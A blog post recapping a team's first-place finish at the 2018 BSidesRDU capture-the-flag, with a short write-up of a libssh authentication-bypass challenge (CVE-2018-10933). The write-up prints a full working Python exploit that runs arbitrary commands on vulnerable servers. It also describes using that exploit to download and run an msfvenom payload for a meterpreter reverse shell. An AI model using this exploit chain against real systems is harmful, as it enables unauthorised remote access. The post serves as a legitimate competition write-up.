2018 BSidesRDU CTF

Winner! Winner!

Welcome Thrillhouse Group took first place at the 2018 BSidesRDU CTF by that was put on by Eversec CTF.

BSidesRDU Final Score Board.

Team Ntropy was in the lead for most of the day and put up a really good fight, but WTG was able to pull ahead in the last few hours and hold first place till the end. 

Our prize for taking first place was a copy of Clear and Present Danger by Tom Clancy:

 
Clear and Present Danger.

However this is no ordinary edition! 
This copy contains what appears to be a silk-screened or possibly etched BSidesRDU 2018 flask.

BSidesRDU Flask.

The team didn't really have time to put together any write-ups for this event. We were just too busy trying to overtake Ntropy the whole day.

However, I did make some mental notes on the challenge involving the libssh vulnerability CVE-2018-10933, and still have some spool files from using metasploit so I'll talk about that briefly.

[1] nmap indicated libssh

Nmap scan report for 192.168.0.201
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=10/19%Time=5BCA2779%P=x86_64-pc-linux-gnu%r(NUL
SF:L,16,"SSH-2\.0-libssh_0\.8\.1\r\n");
MAC Address: 02:42:C0:A8:00:C9 (Unknown)

This was the only port open on this host. Normally, OpenSSH will clearly disclose exactly what's running and we can see libssh2.0 referenced in the last line, so I threw all of the PoCs at it hoping something would stick.

Here's how that went:

[2] use auxiliary/scanner/ssh/sshlib

msf auxiliary(scanner/ssh/sshlib) > options

Module options (auxiliary/scanner/ssh/sshlib):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOSTS    192.168.0.201    yes       The target address range or CIDR identifier
   RPORT     22               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  root            yes       SSH username

msf auxiliary(scanner/ssh/sshlib) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The libssh metasploit module did not work at all. 

[3] Blackbunny PoC 

The next script I saw being passed around was from Blackbunny's github.

I first attempted the bypass script but that failed. I then fumbled with the fakekeyscript but in the end I got nowhere with either of these. 

[4] vulnhub PoC FTW!

The next PoC script I found was on vulnhub's libssh repo for CVE-2018-10933

If you follow the link and scroll down a bit you will find this script:
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))


This script worked like champ for this challenge.

I was able to test it by starting a python webserver: # python -m SimpleHTTPServer 8080
Then I used the script to have the target run a wget command to download "test" from my webserver. I saw the attempt and at that point I knew I had RCE.

[5] Exploit

The steps to exploit were executed one at a time as my attempts to use multiple commands in a single line didn't play nice with the PoC script. 

So I used msfvenom to create A.elf and used metasploit to run a handler for the incoming connection.

I then used the PoC script to wget A.elf from my system, then I used the script to make A.elf executable on the target system, and finally I used the script to run A.elf.

The result was a meterpreter session:

Meterpreter Session.

At this point it was a simple matter of finding the flag, which if I remember correctly was in /root/flag.txt.

There are a ton of PoCs for this vuln out there now, here's another that I have saved but never got around to testing: https://github.com/SoledaD208/CVE-2018-10933


Wrap-Up
For those that are interested, here are all of our solves:

Challenge Title  Challenge Points  Solves
droop basic  700 2
nothing.png  500 7
rc4js  475 5
hello droop  450 3
maldoc4  420 5
salesman.jpeg  400 10
libs  385 4
silky.tar  375 9
ez.tar  350 4
seequi  320 4
zip  300 3
wrblr.jar  285 5
2.txt  240 2
api  220 3
trivia 5  200 9
ftp  190 17
dir  175 9
yum  155 3
1.txt  150 5
droop3  150 5
base  140 9
strange_numbers.txt  120 18
osint 1  100 2
maldoc1  75 6
trivia 3  50 13
trivia 4  50 16
password  25 30
trivia 2  25 11
trivia 1  25 20
maldoc2  25 3
Free Twitter Flag  15 15
donut  5 1

Many thanks to the WTG members that were able to make it. We sat for a good 8 hours, ate food from a truck (though I don't think Rebecca ate at all!) ...and somehow we used up way more drink tickets than we were supposed to have.

I had a blast competing with you all by my side and I can't wait till we have an opportunity to do it again!

-strupo_


Popular posts from this blog

2018 Derbycon CTF - Jenkins

The Audacity of Some CTFs